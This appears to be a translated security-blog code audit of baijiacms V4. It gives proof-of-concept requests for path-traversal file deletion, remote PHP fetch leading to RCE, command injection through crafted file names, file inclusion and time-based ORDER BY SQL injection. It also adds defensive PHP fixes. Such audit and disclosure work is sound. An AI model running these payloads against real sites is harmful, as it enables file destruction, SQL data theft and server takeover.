baijiacmsV4 Code Audit!
· 2021-09-25
Author: Editor: White Hat Community (白帽子社区) operations team
"The White Hat Community online CTF range BMZCTF welcomes everyone to practice and learn here. BMZCTF is wholly dedicated to giving cybersecurity competitors a quality learning environment. Link: http://www.bmzclub.cn/"
Others have already dug into this one before! I have been learning code auditing recently, so here is another round of learning! 🐱🚀
First, get familiar with the code structure!
Code structure
- addons: plugins
- api: interfaces
- assets: static files
- attachment: upload directory
- cache: cache directory
- config: system configuration files
- include: system files
- system: backend code
![](https://filescdn.proginn.com/f8c1c5e2c822e800d5a4719a5ed92f6a/cae8e9e3da2940c445c3429e4267b9de.webp)
![](https://filescdn.proginn.com/b0705cb77ebacba306a2220eaa54d934/ce72ca2608789d2ecce16a7841c1f69c.webp)
I personally split them into two parts: one is system itself, the other is eshop!
![](https://filescdn.proginn.com/c6fc9b5f91c42efddebc8f05380b0b1d/e9c40ddfa63e14531d1827628ec9f839.webp)
Vulnerability reproduction
Arbitrary file deletion
No admin privileges required
Vulnerable file location:
/system/eshop/core/mobile/util/uploader.php
![](https://filescdn.proginn.com/2a8a137e931b528180040e4377cc9e79/fc7159fd91b48825e39e4dbe5eea5463.webp)
![](https://filescdn.proginn.com/73a6de601d06f1b3e13633d4bc51ba46/4c289d761e55f9e9e8ad8f57458ca82d.webp)
![](https://filescdn.proginn.com/74e3ca15e6cae9f45900842d38876366/c661a6408ef58584c677e3e1b28ea7c5.webp)
From the screenshots above you can see that $operation and $file are both controllable!
Follow into file_delete():
![](https://filescdn.proginn.com/238a2fee2873e23a251585f36f99a855/651bcb1044e4369e5b182523beea6152.webp)
![](https://filescdn.proginn.com/bc7161f1648879212d2d352b3fb11f30/2ee1221002ea6061d35eed9172d5fa07.webp)
$settings comes back empty! So file deletion becomes easy!
![](https://filescdn.proginn.com/0915fbbbea84b2cbd624ca37cf5e3ce3/8527ea69b6ac4ff1855a733c9be90c28.webp)
poc
`/index.php?mod=mobile&act=uploader&op=post&do=util&m=eshop&op=remove&file=../flag.txt`
Debugging:
![](https://filescdn.proginn.com/ebaa9ed7b38538ff70b6aab85bf742db/51e735d4eb7bbb4279e3ae59c873bf0c.webp)
You can see the check is skipped straight over!
![](https://filescdn.proginn.com/98db4c2b589b16eb9a133617c27b74e9/a35e4856e5cf15d3840089200629159e.webp)
![](https://filescdn.proginn.com/3f5a6788e58ee2755be00cea4dd48dd8/8250dfe83db014b9768bab1c2a338c7c.webp)
flag.txt has been deleted!
Arbitrary path deletion
Requires backend (admin) privileges!
system/manager/class/web/database.php
![](https://filescdn.proginn.com/d2479d5ad785609fd22331ab1cbd2e91/4c3c17a35d3706f77483bf181765a7ab.webp)
This one is plain to see: it only checks whether the directory exists, then deletes the directory!
![](https://filescdn.proginn.com/cffd87ba2184add0155da441df5adc98/e63b6cb505f4204cdb78285f4467d3b5.webp)
poc
`/index.php?mod=site&act=manager&do=database&op=delete&id=Li8uLi8uLi90ZXRl`
After deletion:
![](https://filescdn.proginn.com/5d1a572e3f4d4e270cdc93e8c04f0fda/3f1c7b4ef9ce69fb797ad3c9fa0da01e.webp)
![](https://filescdn.proginn.com/3ae00bf3e6f89592ca75a20a4de4ede3/72349f60334581a80d495beb391cd363.webp)
Backend RCE
Vulnerable file (backend):
/system/public/class/web/file.php
![](https://filescdn.proginn.com/b84c3a0483c41cf1f7c473d9e1cb627b/0e87c94be936c774dcee104c9c62b64d.webp)
![](https://filescdn.proginn.com/96a21188c39789b282396650eade906a/92b2d53e7925e20e04fef713b61cfd4a.webp)
poc
`/index.php?mod=site&act=public&do=file&op=fetch&url=http://xxx.xxxx.xxxx/aaa/1.php`
![](https://filescdn.proginn.com/0c2eabffec02c3ec5652770e3623e091/ba27b2b6a4b2a3b06846af60ccf000a8.webp)
Written successfully:
![](https://filescdn.proginn.com/f0bac9eadffd1be2783ed141e376075d/172eaede217f1cc47b02986820f4b5ef.webp)
RCE
Vulnerable file
/system/weixin/class/web/setting.php
![](https://filescdn.proginn.com/eddf8627950cd54ad19f0d810aa4af77/c008f549739ac57b77b56dddce547659.webp)
![](https://filescdn.proginn.com/13c9f0abd8fdb56dbffd1116147d314e/6d18b06f8723d89373310787e8db5f7d.webp)
$file_full_path is passed straight into system()! We can construct a file name to get RCE!
![](https://filescdn.proginn.com/fceed5b8967ba64535efb466de183d6b/fd00bc93dc332879aa7fb29b662b1878.webp)
But image_compress_openscale is empty! Let's set the scaling option!
![](https://filescdn.proginn.com/e8a1b502399268466a01a266b709dcc9/00735bba2037b4084312541fcab1a6cd.webp)
After setting it:
![](https://filescdn.proginn.com/33f3c2d6fcbc99682aafac4518ae7937/10667766e53011248714500682ddcdef.webp)
I added a $a myself to see the value more clearly!
![](https://filescdn.proginn.com/7edd72eb8b10fb26675d0d6a6fc235b4/820887e7026c53d2a7867e33578fa459.webp)
poc
```text
convert -quality 80
D:/phpstudy_pro/WWW/baijiacms_v4_1_4_20170105(2)/;calc;.txt #
D:/phpstudy_pro/WWW/baijiacms_v4_1_4_20170105 (2)/;calc;.txt #
```
![](https://filescdn.proginn.com/cd78f062e201d854f4eacbd5dc26ad8d/0ec3c176efff06348eda0f8d2e4defca.webp)
But something unexpected happened! 🐱🚀
![](https://filescdn.proginn.com/e603d4340b2d1eca7e9502706d985850/803f1bffe3ecaa7607aa8b9ea5e3c68e.webp)
The semicolon got recognized!
Just switch to a different shell metacharacter!
poc2
```text
convert -quality 80
D:/phpstudy_pro/WWW/baijiacms_v4_1_4_20170105 (2)/&calc;.txt #.txt
D:/phpstudy_pro/WWW/baijiacms_v4_1_4_20170105 (2)/&calc;.txt #.txt
```
That doesn't work either! file_move is probably where it goes wrong!
![](https://filescdn.proginn.com/f5d79ba08a499e40bf86dd4de3451b9b/0184271c117a0b2132c269a3453b05ef.webp)
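The root cause above is a user-influenced file name reaching system() unquoted. As an added example (not baijiacms code), this is how the convert invocation can be built so that a crafted name can never break out of its argument; the function name, the allow-list character set and the sample paths are my assumptions:

```php
<?php
// Added example, not baijiacms code: build the convert command so the file
// name stays a single argument. Function name and paths are illustrative.

function build_convert_command(string $srcPath, string $dstPath, int $quality): ?string
{
    // First line of defence: a moved upload should carry a server-generated
    // name, so anything outside a tight character set is refused up front.
    // ';' '&' '|' '`' '$' are deliberately absent from the class.
    foreach ([$srcPath, $dstPath] as $p) {
        if (strpos($p, "\0") !== false
            || !preg_match('#^[A-Za-z0-9_./:\\\\ -]+$#', $p)) {
            return null;
        }
    }
    $quality = max(1, min(100, $quality));

    // Second line: escapeshellarg() quotes each argument for the current
    // platform, so any metacharacter that did get through is handed to
    // convert literally instead of being parsed by the shell system() spawns.
    return sprintf(
        'convert -quality %d %s %s',
        $quality,
        escapeshellarg($srcPath),
        escapeshellarg($dstPath)
    );
}

// Constructed inputs: a server-named upload, and the ";calc;.txt" style name
// from the write-up, which fails the allow-list before any command exists.
$ok  = build_convert_command('/var/www/attachment/a1b2c3.jpg',
                             '/var/www/attachment/a1b2c3_s.jpg', 80);
$bad = build_convert_command('/var/www/attachment/;calc;.txt',
                             '/var/www/attachment/out.jpg', 80);
if ($ok !== null) {
    // Only a fully validated command string ever reaches system().
    // system($ok);
}
```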
Going further
Let's see whether there are more holes to dig!
Arbitrary file deletion
Vulnerable file
system/eshop/core/web/shop/category.php
This file also calls file_delete, and thumb_old is controllable! It is just a question of how to reach it!
![](https://filescdn.proginn.com/43a2294eb13e737afc0d2b274d86cb08/2fa4c14968898e2a84048079ae2dcee7.webp)
The key is bypassing the checksubmit function!
![](https://filescdn.proginn.com/ee0248228780de069189257bf7417eb0/0bd0942fbc1c1b6e55144c3c21d7fa6e.webp)
Just make sure $_CMS['isajax'] exists!
![](https://filescdn.proginn.com/242f0e91b08976820412ba5f8b55b46d/90f3e87cda35f564153ad87f11211b28.webp)
Grep the whole project: extends.inc.php
![](https://filescdn.proginn.com/10615527bd434c9d18d487f1d5b31424/d4f40f0f1e150e2340b0e705ccc2b0fb.webp)
Now it is very easy!
poc
```http
POST /index.php?mod=site&do=shop&act=category&m=eshop&op=post&submit=1&id=1111&catename=aaaaaa&thumb_old=../flag.txt HTTP/1.1
Host: upload.top
Content-Length: 31
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://upload.top
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://upload.top/index.php?mod=site&do=shop&act=category&m=eshop&op=post&submit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __fileupload_type=image; __fileupload_dest_dir=; __fileupload_global=; XDEBUG_SESSION=PHPSTORM; PHPSESSID=1111
Connection: close

{"a":1,"b":2,"c":3,"d":4,"e":5}
```
![](https://filescdn.proginn.com/127f0e156c212017032ef2b11df580a9/bc98d2c1764eb56ae54b1378dcf5a522.webp)
Deleted successfully! 🐱👓
![](https://filescdn.proginn.com/9bedf18bb4bbe533d32d0e7270297242/6a8595278479030793933f9aae8150cf.webp)
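All three deletion bugs above (uploader.php, database.php and category.php) share one defect: the path derived from request input is handed to a delete routine with no containment check. As an added example (not baijiacms code), here is a delete helper that resolves the path and refuses anything outside an allowed base directory; the function name, directory names and sample values are my assumptions:

```php
<?php
// Added example, not baijiacms code: a delete helper that refuses any target
// outside an allowed base directory. This closes the "../flag.txt" traversal
// seen in uploader.php and category.php; names here are illustrative.

function safe_delete(string $baseDir, string $userPath): bool
{
    // Canonicalise the base directory once; it must exist.
    $base = realpath($baseDir);
    if ($base === false) {
        return false;
    }

    // Reject NUL bytes and absolute or drive-letter paths outright.
    if (strpos($userPath, "\0") !== false
        || preg_match('#^([A-Za-z]:|[\\\\/])#', $userPath)) {
        return false;
    }

    // realpath() resolves "..", symlinks and mixed separators, and returns
    // false for a missing file, so a non-existent target is rejected too.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false) {
        return false;
    }

    // Containment check: the resolved path must begin with base + separator,
    // which also rejects "" or "." resolving to the base directory itself.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        error_log("blocked delete outside $prefix: $userPath");
        return false;
    }

    // Only regular files are deleted; directory removal (the database.php
    // case) needs its own id-to-path mapping and never goes through here.
    if (!is_file($target)) {
        return false;
    }
    return unlink($target);
}

// Constructed call sites: the first stays under attachment/, the second is
// the traversal value from the write-up and is refused before unlink().
$uploadDir = __DIR__ . '/attachment';
safe_delete($uploadDir, 'images/avatar.jpg');
safe_delete($uploadDir, '../flag.txt');
```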
File inclusion
`include $file;`
![](https://filescdn.proginn.com/aee8581cab7f7a86d26823e93016fd6b/241351bbcb4a1805497bb245559186b4.webp)
poc
`/index.php?mod=site&do=shop&act=../../core&m=eshop`
Exploitation requires a file ending in .php, and you must know the php file's name and location! So it comes down to whether you can get one written first!
SQL injection
system/eshop/core/mobile/goods/index.php
Single quotes are filtered globally! But there is an order by injection here!
A small catch:
Time-based blind injection
payload
`order by if(1=1,1,sleep(1))`
Test results
```sql
select * from ha order by if(1=1,1,sleep(1)); # normal response time
select * from ha order by if(1=2,1,sleep(1)); # delayed
```
While testing I found the delay was not the 1 second from sleep(1) but more than 1 second. In the end I found the delay is a multiple of the number of rows the query returns. The formula:
delay = seconds in sleep(1) * number of rows queried
The ha table I tested has five rows, so it was delayed 5 seconds. When the query returns many rows, the delay gets very long. When writing a script you can add a timeout parameter to avoid an overly long delay. (When the table has only one row there is no delay.)
poc
`/index.php?mod=mobile&do=goods&act=index&m=eshop&op=get_list&order=111&random=1`
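Quote filtering cannot protect an ORDER BY clause, because the injected `if(1=2,1,sleep(1))` needs no quotes, and ORDER BY columns cannot be bound as prepared-statement parameters. As an added example (not baijiacms code), the order parameter is mapped through a fixed allow-list instead; the same approach applies to the `act` value of the include above. Table, column and the `dir` parameter name are my assumptions, while `order` and `random` come from the PoC URL:

```php
<?php
// Added example, not baijiacms code: ORDER BY built only from allow-listed
// identifiers. Table, column and 'dir' parameter names are illustrative.

function build_goods_order(array $query): string
{
    // Request value => real column; anything else falls back to the default,
    // so 'order=111' or 'order=if(1=2,1,sleep(1))' never reaches MySQL.
    $columns = [
        'newest' => 'createtime',
        'price'  => 'marketprice',
        'sales'  => 'sales',
    ];
    $key    = $query['order'] ?? '';
    $column = $columns[$key] ?? $columns['newest'];

    // Direction is likewise a two-value choice, never raw input.
    $dir = (($query['dir'] ?? 'desc') === 'asc') ? 'ASC' : 'DESC';

    // 'random=1' from the PoC URL: RAND() is the only non-column ordering.
    if (!empty($query['random'])) {
        return 'ORDER BY RAND()';
    }
    return "ORDER BY `$column` $dir";
}

function goods_list_sql(array $query): string
{
    // Filters stay in bound placeholders; only the allow-listed ORDER BY
    // fragment is interpolated into the statement text.
    return 'SELECT id, title, marketprice FROM goods WHERE pcate = :pcate '
         . build_goods_order($query)
         . ' LIMIT :offset, :limit';
}

// Constructed requests: the second carries the injected value from the
// write-up and degrades to the default ordering instead of a sleep() probe.
$legit    = goods_list_sql(['order' => 'price', 'dir' => 'asc']);
$injected = goods_list_sql(['order' => 'if(1=2,1,sleep(1))']);
```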
Articles:
[https://xz.aliyun.com/t/9955#toc-0](https://xz.aliyun.com/t/9955#toc-0)
[https://www.wrpzkb.cn/rce/](https://www.wrpzkb.cn/rce/)
[https://yang1k.github.io/post/sql%E6%B3%A8%E5%85%A5%E4%B9%8Border-by%E6%B3%A8%E5%85%A5/#%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E7%9B%B2%E6%B3%A8](https://yang1k.github.io/post/sql%E6%B3%A8%E5%85%A5%E4%B9%8Border-by%E6%B3%A8%E5%85%A5/#%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E7%9B%B2%E6%B3%A8)
Found something interesting:
Works on PHP 5 and 7!
`{eval('echo 111;');}` The braces `{}`: I remember when I first started learning to code, the teacher said this is just a syntax form, and you can put all kinds of PHP inside it! 👀
Having read the manual, my understanding is that what is inside is treated as a variable variable, the same meaning as $$a, just written as ${$a}.
![](https://filescdn.proginn.com/cc83bef1fac0396c544eebd5837f7038/8632c311fe29d83b2f095eb5f1ea2a34.webp)
Search for key functions:
- Command injection: system, exec, passthru, `` (backticks), shell_exec, popen, proc_open, pcntl_exec
- Cross-site scripting: echo, print, printf, vprintf, <%=$test%>
- File inclusion: include, include_once, require, require_once, show_source, highlight_file, readfile, file_get_contents, fopen, file
- Code injection: eval, preg_replace with /e, assert, call_user_func, call_user_func_array, create_function
- SQL injection: insert, delete, update, select
- File management: copy, rmdir, unlink, delete, fwrite, chmod, fgetc, fgetcsv, fgets, fgetss, file, file_get_contents, fread, readfile, ftruncate, file_put_contents, fputcsv, fputs
- File upload: move_uploaded_file
popen
No output is returned (blind)!
![](https://filescdn.proginn.com/899d47a626a862ba9b70ceaa3401cd85/46135b4b623f5bf54d25394c24d1cc97.webp)
preg_replace
![](https://filescdn.proginn.com/142ead3e02330a8a95ad09b2c1d60793/ad561e28a8ab006e74f8abcc4b9766af.webp)
call_user_func
![](https://filescdn.proginn.com/18c18eb74396e3b2a23e4fede03d053c/a031440bed90c16e12af70008d1bbb45.webp)
assert
![](https://filescdn.proginn.com/aeeba8ff60e34c79ac2fe0d33545e705/d0f55dcb4e1526d3e755ca0be9f42113.webp)
call_user_func_array
![](https://filescdn.proginn.com/be9f9b08d130f5f3bf36957a88d989f6/cd5307bf6cd9ce3c421bacd344657f7b.webp)